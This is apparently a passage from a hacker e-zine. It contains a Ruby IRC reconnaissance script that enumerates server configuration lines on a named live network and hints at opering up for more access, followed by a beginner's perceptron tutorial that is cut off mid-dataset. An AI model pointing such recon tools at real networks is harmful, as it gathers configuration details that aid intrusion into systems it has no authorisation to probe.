TypeExamine<long> typeExam_long;
TypeExamine<unsigned long> typeExam_ulong;
TypeExamine<float> typeExam_float;
TypeExamine<double> typeExam_double;
TypeExamine<Byte> typeExam_Byte;
TypeExamine<SByte> typeExam_SByte;
TypeExamine<Single> typeExam_Single;
TypeExamine<Char> typeExam_Char;
TypeExamine<Int32> typeExam_Int32;
TypeExamine<UInt32> typeExam_UInt32;
TypeExamine<Int64> typeExam_Int64;
TypeExamine<UInt64> typeExam_UInt64;
Console::ReadKey();
Environment::Exit(0);
}
/////////////////////////////////////////////////////////////////////////////#/
//
// /)
// .--------|.|--------------------------------------------,._
#/ |#PR0JCTZ|o|>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>>}>>>:>
## `--------|.|--------------------------------------------'`^
## \)
#/
###############################################################################
#!/usr/bin/env ruby
# encoding: utf-8
#
# ircrecon.rb by duper for GNY: a reconnaissance client tool for IRC networks
#
# Tested on: ruby 1.9.3dev (2011-09-23 revision 33323) [i386-openbsd4.9]
#
# Essentially, this script retrieves a list of servers connected to the network
# it has registered with via the raw IRC command LINKS. It sends a list of pre-
# defined commands to each server then waits for a proper response to output the
# results. More specifically, all ircd.conf configuration lines are enumerated
# with the STATS command. Expect the output to be highly verbose and to vary
# widely between ircd code/versions/configurations. Some daemons are naturally
# more permissive in granting read access to requested statistics. Also keep in
# mind that the larger the IRC network, the longer you're going to wait..
#
# In order to maximize reporting capability, one could cause the script to
# "oper up", i.e. set user mode +O (note the capitalized 'O', which represents
# network-wide operator status, as opposed to the lowercase o:line, which is
# only for the local server). In theory, further information can be gathered by
# connecting to a network hub as a server, e.g. as is done by the /CONNECT
# command used by IRC operators.
#
require 'socket'
require 'openssl'
# Nickname to use when connecting to the target IRC server
IRC_NICK = 'IRC-Recon'
# Username part of host mask to claim when registering with the network
IRC_USER = 'ircrecon'
# "Real name" or "gecos" information part of USER command in raw IRC
IRC_INFO = %q{ircrecon.rb by duper}
# Alphabetic DNS hostname or numeric IP address of target IRC server
IRC_HOST = 'irc.rizon.net.'
# Port number that the ircd is listening on, a.k.a. P:lines.
IRC_PORT = 6697
# Will this be an SSL-based TCP connection?
IS_SSL = true
## Toy with these WAIT_* globals if you experience Excess Flood, Max Sendq, etc.
# Amount of time in seconds to wait when server load is heavy
WAIT_SECS1 = 1.4
# How long to sleep after sending a large sequence of commands
WAIT_SECS2 = 2.8
# Length of grace period between keep-alive PONG messages
PONG_SECS = 8
# Label output that is not raw IRC responses with the following text
OUT_LABEL = '{(IRC-RECON)}'
# Boolean that increases output verbosity when set to true; displays the STATS
# request that is currently awaiting a response (good for large networks.)
OUT_VERBOSE = true
## Lists of local and remote raw IRC commands
# Localized raw IRC commands, i.e. those without any server name argument.
IRC_LOC_CMDS = [ 'HELP',
'MAP', ]
# Uncommenting LIST may slow things down on large networks with many channels.
# Technically however, LIST is a localized command just like the rest.
# 'LIST', ]
# IRC network commands, i.e. raw IRC requests that take a remote server name
# as an argument. In raw IRC this appears as: "COMMAND :remote.server.name".
# Feel free to add any additional custom raw IRC commands here.. The default
# list was taken from RFC's and the response of the Unreal IRC HELPOP command.
IRC_NET_CMDS = [ 'ADMIN',
'CREDITS',
'DALINFO',
'INFO',
'LICENSE',
'LUSERS',
'MODULES',
'MOTD',
'RULES',
'SERVLIST',
'TIME',
'TRACE',
'USERS',
'VERSION', ]
### DON'T CHANGE ANYTHING BELOW HERE UNLESS YOU KNOW WHAT YOU'RE DOING!
asock, @@athread, @@acount = false, false, 0
def prem_exit(astr)
puts OUT_LABEL
puts "#{OUT_LABEL} #{astr} signal trap received; exiting prematurely."
puts OUT_LABEL
@@athread.kill() if @@athread
exit(-1)
end
Signal.trap('INT') do
puts
prem_exit('Interrupt')
end
Signal.trap('PIPE') { prem_exit('Pipe') }
Signal.trap('TERM') { prem_exit('Termination') }
def show_except(aexc = nil)
return false if aexc.nil?
$stderr.puts(aexc.backtrace.join("\n"))
$stderr.puts(aexc.inspect)
true
end
puts OUT_LABEL
puts "#{OUT_LABEL} ircrecon.rb script by duper <super@deathrow.vistech.net>"
puts "#{OUT_LABEL} #{RUBY_DESCRIPTION}"
puts OUT_LABEL
begin
print "#{OUT_LABEL} Trying..."
if IS_SSL
include OpenSSL
@@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
@@asock_context = SSL::SSLContext.new()
@@asock_socket = SSL::SSLSocket.new(@@asock, @@asock_context)
@@asock_socket.sync_close = true
@@asock_socket.connect()
@@asock = @@asock_socket
puts %q{SSL-IRC connection established!}
puts OUT_LABEL
puts "#{OUT_LABEL} #{@@asock_socket.peer_cert_chain}"
acipher = @@asock_socket.cipher
analgo, aproto, akeysz = acipher[0], acipher[1], acipher[2]
puts OUT_LABEL
puts "#{OUT_LABEL} Algorithm: #{analgo} Protocol: #{aproto} Key Size: #{akeysz} bits"
else
@@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
puts %q{IRC connection established!}
end
puts OUT_LABEL
rescue Exception => e
puts %q{'TCP connection failed!'}
show_except(e)
exit(-1)
end
print "#{OUT_LABEL} Connected to port #{IRC_PORT} on host #{IRC_HOST}"
print " (SSL-enabled)" if IS_SSL
puts
puts "#{OUT_LABEL} Registering client info with IRC network.."
puts OUT_LABEL
begin
@@asock.puts('NICK ' << IRC_NICK)
@@asock.puts('USER ' << IRC_USER << " . . :" << IRC_INFO)
rescue Exception => e
show_except(e)
exit(-2)
end
loop do
l = nil
begin
l = @@asock.gets()
break if !l or l.empty?
rescue Exception => e
puts %q{Error reading data while registering IRC client!}
show_except(e)
exit(-3)
end
puts l
# Handle nospoof patch that deters all forms of blindly spoofing IP addresses
if l[0,5].upcase.start_with?('PING ')
@@asock.puts('PONG :' << l.split[1])
puts "#{OUT_LABEL} Responded to target server's nospoof PING nonce"
break
end
# Nickname already in use
if l.include?(' 433 ')
@@acount += 1
@@asock.puts("NICK #{IRC_NICK}#{@@acount}")
next
end
# Read end of /MOTD, we're already registered! :-)
if l.include?(' 376 ')
puts "#{OUT_LABEL} Target server is not using a nospoof patch!"
break
end
end
servs, @@linez = [], []
begin
print "#{OUT_LABEL} Enumerating linked server names:"
@@asock.puts('LINKS')
loop do
l = @@asock.gets()
next if !l or l.empty?
x = l.split[3 .. -1]
next if x.nil? or x.empty?
y = l.split[0 .. 2].join(' ')
if y.include?(' 364 ')
@@linez << l
servs << x.first
next
end
break if y.include?(' 365 ')
end
rescue Exception => e
puts %q{Error encountered while reading LINKS response!}
show_except(e)
exit(-4)
end
servs.each { |s| print ' ' << s }
@@linez.each { |k| puts k }
puts
puts "#{OUT_LABEL} Starting 'keep-alive' PONG sending thread"
@@athread = Thread.new() {
begin
loop do
@@asock.puts('PONG :' << IRC_HOST)
sleep(PONG_SECS)
end
rescue Exception => e
puts %q{Caught exception while sending 'keep-alive' PONG message!}
$stderr.puts(e.inspect)
next false # 'return' is not allowed inside a thread block
end
true
}
puts "#{OUT_LABEL} Executing list of localized raw IRC commands"
begin
IRC_LOC_CMDS.each { |c| @@asock.puts(c) }
rescue Exception => e
puts %q{Unable to send local command request data to server}
show_except(e)
exit(-5)
end
@@load_flag, @@ahash = false, {}
# We're getting the STATS reports for the ircd.conf lines individually, so we
# don't miss any due to the server load being too high at a particular time.
# This is bound to happen consistently on a large/busy IRC network--be prepared
# to wait a while for the results.
def get_stats(achar, aserv = '')
begin
if aserv.nil? or aserv.empty?
@@asock.puts('STATS ' << achar)
else
@@asock.puts('STATS ' << achar << ' ' << aserv)
end
loop do
l = @@asock.gets()
return false if not l or l.empty?
# End of /STATS report
break if l.include?(' 219 ')
# Permission denied (not an IRC operator)
break if l.include?(' 481 ')
# Default /STATS response ("Unused", according to RFC2812 Section 5.1)
break if l.include?(' 210 ')
# Server load is temporarily too heavy
if l.include?(' 263 ')
if !@@load_flag
@@load_flag = true
print "#{OUT_LABEL} Warning: Server load is temporarily too heavy!"
puts ' (This might take a while)'
end
# puts statement that was used for debugging current STATS status
if OUT_VERBOSE
@@ahash[achar] = Hash.new if !@@ahash[achar]
if !@@ahash[achar][aserv]
@@ahash[achar][aserv] = true
puts "#{OUT_LABEL} STATS #{achar} #{aserv}"
end
end
sleep(WAIT_SECS1)
@@asock.puts('STATS ' << achar << ' ' << aserv)
next
end
puts l
end
rescue Exception => e
show_except(e)
end
sleep(WAIT_SECS1)
true
end
puts "#{OUT_LABEL} Executing list of remote raw IRC commands"
servs.each do |s|
puts "#{OUT_LABEL} Beginning to enumerate data from #{s} ..."
IRC_NET_CMDS.each do |c|
begin
# Build a fresh string; '<<' would append to the command constant itself
@@asock.puts("#{c} #{s}")
rescue Exception => e
show_except(e)
end
end
('a' .. 'z').each { |x| get_stats(x, s) }
sleep(WAIT_SECS2)
('A' .. 'Z').each { |x| get_stats(x, s) }
puts "#{OUT_LABEL} Finished enumerating data from #{s}!"
end
begin
puts "#{OUT_LABEL} Reconnaissance sequence complete on all servers!"
print "#{OUT_LABEL} Waiting on cleanup of outstanding threads"
@@athread.kill() if @@athread
puts "Done!"
puts "#{OUT_LABEL} Displaying remaining server responses, then exiting."
rescue
end
loop do
begin
l = @@asock.gets()
next if !l or l.empty?
if l.start_with?('ERROR')
puts l
break
end
x = l.split[3 .. -1]
next if !x or x.empty?
y = l.split[0 .. 2].join(' ')
# Ignore erroneous STATS response codes
next if y.include?(' 210 ') or y.include?(' 481 ') or y.include?(' 219 ')
z = x.join(' ')
next if not z or z.size <= 1
z = z[1 .. - 1] if z.start_with?(':')
print '[' << y.split.first[1 .. -1] << '] '
puts z
rescue Exception => e
$stderr.puts(e.inspect)
break
end
end
puts OUT_LABEL
puts "#{OUT_LABEL} Information gathering successful!"
puts OUT_LABEL
exit(0)
#EOF
################################################################################
#***END*OF*FILE**DUPER'S*CODE*CORNER**A*HAXNET*#PROJECTS*PRODUCTION*(TM)2011***#
################################################################################
[==================================================================================================]
-=[ 0x05 How Skynet Works: An Introduction to Neural Networks
-=[ Author: elchupathingy
-=[ IRC: irc.gonullyourself.org #gny
Skynet was designed as a system to determine the greatest threat and determine the best course
of action for survival. The real question about Skynet is not whether or not it will kill us, but
rather how it will know to kill humans. The answer to that is quite simple through an understanding
of machine learning. How does this work, and how does Skynet come to the conclusion to kill all
humans?
Machine learning is the area of Computer Science that describes and implements ways for computers to
learn how to recognize and, in a way, "think" about the data fed into their learning algorithms. But
what makes this possible?
To continue this in depth, we need to first look into how the human brain works. At a high
level, a symphony of biological, chemical, and electrical events and reactions combine to form what
we perceive to be conscious thought. This is a rather simple view of the actual details, so let's
take a closer look at one of these biological, chemical, and electrical events.
The following is a simple ASCII art representation of a neuron:
\/
Axon /\/<
\/ \/ \ /
\/ \__| \ _________ __/
\_____\__ / _______ \ / \ \/
>\ | \_________/ / \ \_/ |_____/___<
\__/| ___________/ \__ | \
___| / \__/ /\
/ \___/ \ \
/\ / \ \ \
_/\ \ /\ \
/ \ \ \
/\ /\ Nucleus Axon Terminal
\
\
\
Dendrites
From left to right:
Dendrites: The inputs that receive electrochemical stimulation
Nucleus: The "brain" and control center of the neuron
The nucleus determines when the neuron fires and various other functions, but
for this article we will only concern ourselves with its control over the
firing process.
Axon: Transmits electrical signals from the nucleus to the Axon terminals
Axon Terminal: Emits electric impulses to be sent to other connecting neurons in the brain
It should be noted that this is only a typical neuron, and there are many, many different kinds.
Neurons function by accepting chemical inputs, building up an electrical charge, and firing an
impulse when that charge exceeds the neuron's threshold. The event of firing an impulse is known as
an action potential. This event causes more chemicals to be released and, in effect, starts a chain
reaction. This is the basic principle of how the brain performs computation.
Now, how is this useful? A simple model of the neuron has to be developed. Luckily for this article,
this has already been accomplished by Frank Rosenblatt, and it is called a perceptron. A perceptron
is an artificial model of a single neuron and of its decision to fire or not fire.
It contains:
A set of inputs: X
A set of weights: W
A threshold function: G
A threshold: T
Like a neuron, the perceptron will only fire if its threshold is exceeded.
The set of inputs, X, for this article will strictly be binary.
The weights are floating point values, initially chosen such that -1 < W < 1.
The threshold function is the summation of products of the weights and corresponding inputs, such
that:
G = SUM[i=0..N] SUM[j=0..M] ( Wij * Xij )
So, these pieces come together to form our perceptron. It can receive |x| inputs and, upon putting
these inputs through the threshold function, it will either fire (returning a 1) or not fire
(returning a 0).
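As a rough sketch of the pieces listed above (this is not the code from the article's HTML page),
the firing decision fits in a few lines of JavaScript. The function name perceptronOutput and the
sample numbers are made up for illustration.

```javascript
// Hypothetical helper: weighted sum of the inputs compared against a threshold.
// Returns 1 if the perceptron fires, 0 otherwise.
function perceptronOutput(weights, inputs, threshold) {
  if (weights.length !== inputs.length) {
    throw new Error("weights and inputs must have the same length");
  }
  var sum = 0;
  for (var i = 0; i < inputs.length; i++) {
    sum += weights[i] * inputs[i];
  }
  return sum > threshold ? 1 : 0;
}

// Illustrative values only: two binary inputs, two weights, threshold 0.7.
var bothOn = perceptronOutput([0.5, 0.5], [1, 1], 0.7); // weighted sum is 1.0
var oneOn = perceptronOutput([0.5, 0.5], [1, 0], 0.7);  // weighted sum is 0.5
console.log(bothOn, oneOn);
```

With these made-up numbers the perceptron behaves like a logical AND: only the case where both
inputs are on pushes the sum past the threshold.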
Now, to make this useful a few technicalities need to be covered. The first is that this model of
the neuron, the perceptron, can have its weights changed but not its thresholds. Since we cannot
directly change the threshold of the perceptron, we must add another input called the bias input.
The bias input is a trick to allow the perceptron to change the threshold. This is done by fixing
its value to -1. Doing so in effect makes the threshold of our perceptron a 0, but it also has the
ability to fluctuate with the bias input's weight. This fluctuation allows the perceptron to find
the optimal firing threshold. Shown below is the summation of the weights and inputs, including the
bias input. The bias input is typically the first input, but this is not required and is just
convention.
-1 * W00 + X10 * W10 + X20 * W20 + ... + Xi0 * Wi0 = y0
-1 * W01 + X11 * W11 + X21 * W21 + ... + Xi1 * Wi1 = y1
.
.
.
-1 * W0j + X1j * W1j + X2j * W2j + ... + Xij * Wij = yj
So, what does this mean? Now that the bias node has been added to the inputs, it has effectively
changed our threshold value to 0 and provided the ability to change the threshold of the perceptron
through manipulation of the weights. This makes the learning ability of the perceptron much stronger.
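To see why the bias trick works, here is a small sketch (function names are hypothetical) that
compares a perceptron with a fixed threshold T against one that has a bias input of -1 whose weight
W0 is set to the same value. The two should agree on every input, which is the whole point: the
threshold has become just another weight.

```javascript
// Plain weighted sum, shared by both versions below.
function weightedSum(weights, inputs) {
  var sum = 0;
  for (var i = 0; i < inputs.length; i++) {
    sum += weights[i] * inputs[i];
  }
  return sum;
}

// Version 1: explicit threshold T that learning cannot touch.
function firesWithThreshold(weights, inputs, threshold) {
  return weightedSum(weights, inputs) > threshold ? 1 : 0;
}

// Version 2: bias input fixed at -1 in slot 0; its weight W0 plays the role of T,
// and the comparison is always against 0.
function firesWithBias(weights, inputs) {
  var biased = [-1].concat(inputs);
  return weightedSum(weights, biased) > 0 ? 1 : 0;
}

// Illustrative check: T = 0.5 and W0 = 0.5 should agree on every binary input pair.
var pairs = [[0, 0], [1, 0], [0, 1], [1, 1]];
var agree = pairs.every(function (p) {
  return firesWithThreshold([1, 1], p, 0.5) === firesWithBias([0.5, 1, 1], p);
});
console.log("bias form matches threshold form:", agree);
```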
Let's now cover the manual way of setting up a perceptron to learn some action or result. The basic
logic operators are quite simple - they require two inputs and produce a single output, which can
model whether the perceptron fires or not.
Let's first look at OR.
Truth table:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 1
The truth table shows us the inputs that our perceptron will receive (X1 and X2) and the expected
output (Y1). Now, let's figure out how to make the perceptron learn this logical function. First, we
need to figure out what its weights will be. This is simple; they will start out as random numbers,
such that -1.0 < Wij < 1.0. They can be one of infinite possibilities. As the neuron learns, the
weights will change to simulate how a neuron learns. A neuron learns through a process of trial and
error with the correct chemical balances to produce the correct firing threshold. The neuron in our
context does the same through changing its weights.
If the sum of the products of the weights and inputs doesn't cause the neuron to fire when it was
supposed to, then the weights must be changed so that the neuron fires the next time it sees this
input. Now, if the neuron is constantly changing the weights to reflect when it was supposed to fire
and not supposed to fire, then the neuron can be said to be unstable. Thus we must introduce a
mechanism to reduce the amount of instability in the neuron. This will be discussed further on. But,
as it stands the neuron will never learn the entire problem. It will only learn a few of the inputs
and expected outputs at a time and never completely generalize a solution.
How can this be solved? The neuron simply "slows down" its ability to learn by changing the amount
by which the weights are allowed to change. This is represented by N, or the learning rate (it has
a fancy Greek name, but learning rate is more specific).
It seems that we have strayed further away from getting our neuron to learn the simple logical
operation OR, but all of this is needed.
Back to the learning and weight changing. To get the new weight, we need to decide how far, and in
which direction, each weight should move. If the error of the perceptron is seen as a function of
the weights, the direction to move comes from the derivative of this function. The real derivation
is quite annoying, so here is a simplified version that will suit the needs of the perceptron:
dWij = ( Tk - Yk ) Xi
The change of the weights, W, can be seen as a function of the Target outputs, Tk, and the real
outputs, Yk, and the input, Xi, such that the new weight, Wij, will change in relation to the
difference of the targets and outputs multiplied by the inputs. But, this raises the earlier problem
of stability. In this manner the neuron will instantly learn the current input and will ultimately
forget any prior learning. Thus, we must slow its learning speed. This is accomplished through the
use of a learning rate, or eta, N. This will effectively act as a mechanism to remember old inputs.
It does so by only taking a portion of the change needed to fix the neuron for the current inputs
rather than the full amount. On a side note, it has been found that an N value that satisfies
0.1 < N < 0.4 is usually sufficient; much bigger values lead to instability and much smaller values
to very slow learning. With that being said, we have arrived at the following formula:
Wij = Wij + N( Tk - Yk )Xi
With this, we can finally begin to learn our logical operation OR.
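Before doing it by hand, here is the update formula as a minimal JavaScript sketch. The function
name updateWeights and the numbers are invented for illustration, and the inputs array is assumed to
already carry the bias input (-1) in slot 0.

```javascript
// One application of Wij = Wij + N * (Tk - Yk) * Xi to every weight.
// 'inputs' is assumed to already include the bias input (-1) in slot 0.
function updateWeights(weights, inputs, target, output, rate) {
  return weights.map(function (w, i) {
    return w + rate * (target - output) * inputs[i];
  });
}

// Illustrative numbers: the perceptron stayed quiet (output 0) but should have fired (target 1).
var before = [0.5, 0.0, 0.0];
var after = updateWeights(before, [-1, 1, 0], 1, 0, 0.25);
console.log(after);
```

Three things are worth noticing in the result: the bias weight drops (lowering the threshold), the
weight on the active input rises, and the weight on the input that was 0 does not move at all. When
the target equals the output, the factor ( Tk - Yk ) is 0 and nothing changes.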
The first step is to choose the weights for our inputs, minding that there are in fact three weights
that need to be picked out.
W0 = -0.05, W1 = -0.02, W2 = 0.02
For the inputs, we will use the above truth table conveniently reproduced below:
Truth table:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 1
Let's start slugging through some numbers, using a learning rate of N = 0.25 and treating any sum
greater than 0 as a firing (an output of 1):
X1 = 0 and X2 = 0
Y1: -1 * -0.05 + 0 * -0.02 + 0 * 0.02 = 0.05
The neuron fired when it shouldn't have, so the weights need to be modified.
W0 = W0 + N ( 0 - 1 ) * -1 = -0.05 + 0.25 = 0.20
W1 = W1 + N ( 0 - 1 ) * 0 = -0.02
W2 = W2 + N ( 0 - 1 ) * 0 = 0.02
Only the bias weight moved, because the other two inputs were 0. Ok, after fixing the weights for
this input, we need to test the next input.
X1 = 1 and X2 = 0
Y1: -1 * 0.20 + 1 * -0.02 + 0 * 0.02 = -0.22
The neuron did not fire when it should have, so the weights need to be modified again.
W0 = W0 + N ( 1 - 0 ) * -1 = 0.20 - 0.25 = -0.05
W1 = W1 + N ( 1 - 0 ) * 1 = -0.02 + 0.25 = 0.23
W2 = W2 + N ( 1 - 0 ) * 0 = 0.02
X1 = 0 and X2 = 1
Y1: -1 * -0.05 + 0 * 0.23 + 1 * 0.02 = 0.07
The neuron fired when it should have, so the weights do not need to be adjusted.
X1 = 1 and X2 = 1
Y1: -1 * -0.05 + 1 * 0.23 + 1 * 0.02 = 0.30
Again, this neuron fired when it should have, so no weight changes are needed. Now, the process is
complete... for this iteration. We have to continue doing this until the network stabilizes and this
happens when all the outputs are equal to the targets and the weights stop moving around. This will
take 4-5 iterations for this particular example.
Eventually, the weights will settle down and the perceptron will have learned this function.
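Doing several more passes by hand gets old quickly, so here is a small sketch of the whole loop. It
is not the code from the article's HTML page; the names fires and train, the cap of 50 passes, and
the learning rate of 0.25 are assumptions made for this example. It starts from the weights picked
above and keeps sweeping the OR truth table until one full pass produces no mistakes.

```javascript
// Output of a perceptron whose weight in slot 0 belongs to the bias input (-1).
function fires(weights, inputs) {
  var sum = -1 * weights[0];
  for (var i = 0; i < inputs.length; i++) {
    sum += weights[i + 1] * inputs[i];
  }
  return sum > 0 ? 1 : 0;
}

// Repeat passes over the data until one full pass produces no errors,
// or until maxEpochs passes have been made.
function train(samples, targets, weights, rate, maxEpochs) {
  var w = weights.slice();
  for (var epoch = 1; epoch <= maxEpochs; epoch++) {
    var errors = 0;
    for (var k = 0; k < samples.length; k++) {
      var y = fires(w, samples[k]);
      if (y !== targets[k]) {
        errors++;
        var biased = [-1].concat(samples[k]);
        for (var i = 0; i < w.length; i++) {
          w[i] += rate * (targets[k] - y) * biased[i];
        }
      }
    }
    if (errors === 0) {
      return { weights: w, epochs: epoch, converged: true };
    }
  }
  return { weights: w, epochs: maxEpochs, converged: false };
}

var orInputs = [[0, 0], [1, 0], [0, 1], [1, 1]];
var orTargets = [0, 1, 1, 1];
var orResult = train(orInputs, orTargets, [-0.05, -0.02, 0.02], 0.25, 50);
var orPredictions = orInputs.map(function (x) { return fires(orResult.weights, x); });
console.log(orResult.converged, orResult.epochs, orPredictions);
```

The "no errors in a full pass" test is the stopping condition described above: every output equals
its target, so the update rule has nothing left to change and the weights stop moving.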
But, how does this work, exactly? It works by dividing the set of solutions into two groups, such
that if we graph it we can draw a line between the points.
*'s mean the perceptron fired.
+'s mean the perceptron did not fire.
1|* *
|
|
|
|
|+___________*
0 1
Looking at this graph, it is easy to see that there is a line that divides the points, making it
look like the following:
1|* *
\
|\
| \
| \
|+__\________*
0 \ 1
As the graph shows, the line divides them with all the *'s on one side and all the +'s on the other.
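Now, where did this line come from? It came from the weights, which in this example are the
coefficients to the line function:
aX + bY = C
Here a = W1, b = W2, and C = W0, since the perceptron fires exactly when W1 * X1 + W2 * X2 is greater
than W0.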
There is a lengthy process to prove this through a few vector calculations and using the inner
product of two vectors, but the basic idea of this is that there exists a line, plane, or hyperplane
through the set of points that separates the points into two distinct sets.
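For the two-input case this can be checked numerically. The sketch below treats a weight vector
[W0, W1, W2] as the line W1 * X + W2 * Y = W0, where W0 is the weight on the -1 bias input. The
helper names and the weights are made up for illustration; they are not the weights the perceptron
above ends up with.

```javascript
// Where the line W1 * X + W2 * Y = W0 crosses each axis.
// Assumes W1 and W2 are non-zero.
function boundaryIntercepts(weights) {
  return { x: weights[0] / weights[1], y: weights[0] / weights[2] };
}

// Which side of the line a point falls on: 1 means "fires", 0 means "does not fire".
function sideOfLine(weights, point) {
  return weights[1] * point[0] + weights[2] * point[1] > weights[0] ? 1 : 0;
}

// Made-up weights [W0, W1, W2] describing the line X + Y = 0.5.
var lineWeights = [0.5, 1, 1];
var intercepts = boundaryIntercepts(lineWeights);
var sides = [[0, 0], [1, 0], [0, 1], [1, 1]].map(function (p) {
  return sideOfLine(lineWeights, p);
});
console.log(intercepts, sides);
```

The line crosses both axes at 0.5, which puts (0,0) on one side and the other three corners on the
other side, the same split as the OR graph.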
Planes and hyperplanes? Yes, these are the solutions for when there are more than two inputs into
the perceptron. An example is found at the end of the article.
So, a problem that can be solved by a perceptron has to have the following properties:
1: Linearly separable via a line, plane, or hyperplane.
2: Answerable by firing or not firing, so essentially a yes or no question.
3: Grouped into distinct classes.
Let's look at the following example of something that is not linearly separable by a line.
Logical function XOR:
_X1_|_X2_|_Y1_
0 | 0 | 0
1 | 0 | 1
0 | 1 | 1
1 | 1 | 0
The Graph of XOR:
1|* +
|
|
|
|
|+___________*
0 1
Looking at the truth table doesn't shed any light on whether this is linearly separable or not, but
looking at the graph shows that there is no line such that the +'s and *'s are in separate
partitions. Thus, XOR cannot be solved like we did OR; it must be put into a higher dimension. We
will use 3D to do that.
We will add another bit of information to separate the two groups, *'s and +'s, so that our
perceptron can solve it.
Let's look over at the JavaScript and HTML page to help do this for us.
When first loading this page, it will have the defaults for the OR function we worked out earlier.
On this page, the number of Iterations and Learning Rate may be changed, and these various options
can be tested by pressing the "start" button. But, what we want to focus on is the Code text
area.
The default looks like the following:
var inputs =
[
[ 0, 0 ],
[ 0, 1 ],
[ 1, 0 ],
[ 1, 1 ]
];
var targets =
[
0,
1,
1,
1
];
var dimensions = 2;
Notice that they are arrays and 'inputs' is a 2D array. The length of 'inputs' must be equal to that
of 'targets', and 'dimensions' must be equal to the length of each sub-array of 'inputs'. This is so
that the code can make the weights vector correctly. Now, we need to make the change to the code
section so that we can get our perceptron to learn the XOR logical operation.
var inputs =
[
[ 0, 0, 1 ],
[ 0, 1, 0 ],
[ 1, 0, 0 ],
[ 1, 1, 0 ]
];
First, we need to change the inputs to be in a 3D space. We have lifted up the first input so that
it will not be in the same plane as the other inputs. This single change is all that is needed to
make the XOR learnable.
The targets vector is changed to the following:
var targets =
[
0,
1,
1,
0
];
This is to reflect how the XOR operation works. And, finally the number of dimensions needs to be
changed to 3.
var dimensions = 3;
Now, change the number of iterations to 30, leave the Learning Rate at the default 0.25, and click
start.
The perceptron should be able to solve the problem. If it did not, hit start again and scroll
through the output textarea to see if it has solved it. In the 'weights' textarea are the various
weight values that are used during the learning process. An exercise would be to look at the weights
as the perceptron tries to learn the XOR using a 2D input matrix.
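If the HTML page is not at hand, the same experiment can be approximated with a short standalone
sketch. This is not the page's code: the names fires and train are hypothetical, and the weights
start at zero instead of random values so that the run is repeatable. It trains once on the flat 2D
XOR inputs and once on the lifted 3D inputs, with 30 iterations and a learning rate of 0.25.

```javascript
// Output of a perceptron whose weight in slot 0 belongs to the bias input (-1).
function fires(weights, inputs) {
  var sum = -1 * weights[0];
  for (var i = 0; i < inputs.length; i++) {
    sum += weights[i + 1] * inputs[i];
  }
  return sum > 0 ? 1 : 0;
}

// Train from all-zero weights; stop early once a full pass has no errors.
function train(samples, targets, dimensions, rate, maxEpochs) {
  var w = [];
  for (var d = 0; d <= dimensions; d++) {
    w.push(0); // one extra slot for the bias weight
  }
  for (var epoch = 1; epoch <= maxEpochs; epoch++) {
    var errors = 0;
    for (var k = 0; k < samples.length; k++) {
      var y = fires(w, samples[k]);
      if (y !== targets[k]) {
        errors++;
        var biased = [-1].concat(samples[k]);
        for (var i = 0; i < w.length; i++) {
          w[i] += rate * (targets[k] - y) * biased[i];
        }
      }
    }
    if (errors === 0) {
      return { weights: w, epochs: epoch, converged: true };
    }
  }
  return { weights: w, epochs: maxEpochs, converged: false };
}

var xorTargets = [0, 1, 1, 0];
var flatInputs = [[0, 0], [0, 1], [1, 0], [1, 1]];
var liftedInputs = [[0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 1, 0]];

var flat = train(flatInputs, xorTargets, 2, 0.25, 30);
var lifted = train(liftedInputs, xorTargets, 3, 0.25, 30);
var liftedPredictions = liftedInputs.map(function (x) { return fires(lifted.weights, x); });
console.log("2D converged:", flat.converged, "3D converged:", lifted.converged, liftedPredictions);
```

The 2D run can never reach an error-free pass, because no single line separates the XOR points, so
it simply runs out of iterations. The 3D run settles because a separating plane exists once the
first input has been lifted.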
The graph for this looks like the following:
(0,0,1)|+
|
|
|
(0,0,0)|__________________*(0,1,0)
/
/
/
/
(1,0,0)*/
+(1,1,0)
It's somewhat difficult to reproduce a 3D plane in ASCII, so just imagine one passing between the +'s
and *'s. The same idea as before applies here; the perceptron is looking to solve the equation of the
plane that separates the two sets. This can be expanded further, but even ASCII lacks the ability to
draw in 4D.
So, how is this a process of learning? The process detailed above is how a single perceptron, or
neuron, learns to solve a linearly separable set of points. It has gained the ability to generalize
a solution to a simple problem and is able to accurately give an answer to all of its inputs. But,
we have simply given it all of the possible outcomes and trained our perceptron on the actual data.
In practice, this is not possible.
To learn from bigger sets of data, a process of training must be developed. The proper way to train
a perceptron or a neural network in an assisted manner is to feed it half of the data, then check
against the other half of the data. Using the perceptron that is in the JavaScript, we can do just
that with some provided data.
Let's look at the following data collected from the Pima Indians diabetes dataset:
var inputs = [
[6,148,72,35,0,33.6,0.627,50,1],
[1,85,66,29,0,26.6,0.351,31,0],
[8,183,64,0,0,23.3,0.672,32,1],
[1,89,66,23,94,28.1,0.167,21,0],
[0,137,40,35,168,43.1,2.288,33,1],
[5,116,74,0,0,25.6,0.201,30,0],
[3,78,50,32,88,31.0,0.248,26,1],
[10,115,0,0,0,35.3,0.134,29,0],
[2,197,70,45,543,30.5,0.158,53,1],
[8,125,96,0,0,0.0,0.232,54,1],
[4,110,92,0,0,37.6,0.191,30,0],
[10,168,74,0,0,38.0,0.537,34,1],
[10,139,80,0,0,27.1,1.441,57,0],
[1,189,60,23,846,30.1,0.398,59,1],
[5,166,72,19,175,25.8,0.587,51,1],
[7,100,0,0,0,30.0,0.484,32,1],
[0,118,84,47,230,45.8,0.551,31,1],
[7,107,74,0,0,29.6,0.254,31,1],
[1,103,30,38,83,43.3,0.183,33,0],
[1,115,70,30,96,34.6,0.529,32,1],
[3,126,88,41,235,39.3,0.704,27,0],
[8,99,84,0,0,35.4,0.388,50,0],
[7,196,90,0,0,39.8,0.451,41,1],
[9,119,80,35,0,29.0,0.263,29,1],
[11,143,94,33,146,36.6,0.254,51,1],
[10,125,70,26,115,31.1,0.205,41,1],
[7,147,76,0,0,39.4,0.257,43,1],
[1,97,66,15,140,23.2,0.487,22,0],
[13,145,82,19,110,22.2,0.245,57,0],
[5,117,92,0,0,34.1,0.337,38,0],
[5,109,75,26,0,36.0,0.546,60,0],
[3,158,76,36,245,31.6,0.851,28,1],
[3,88,58,11,54,24.8,0.267,22,0],
[6,92,92,0,0,19.9,0.188,28,0],
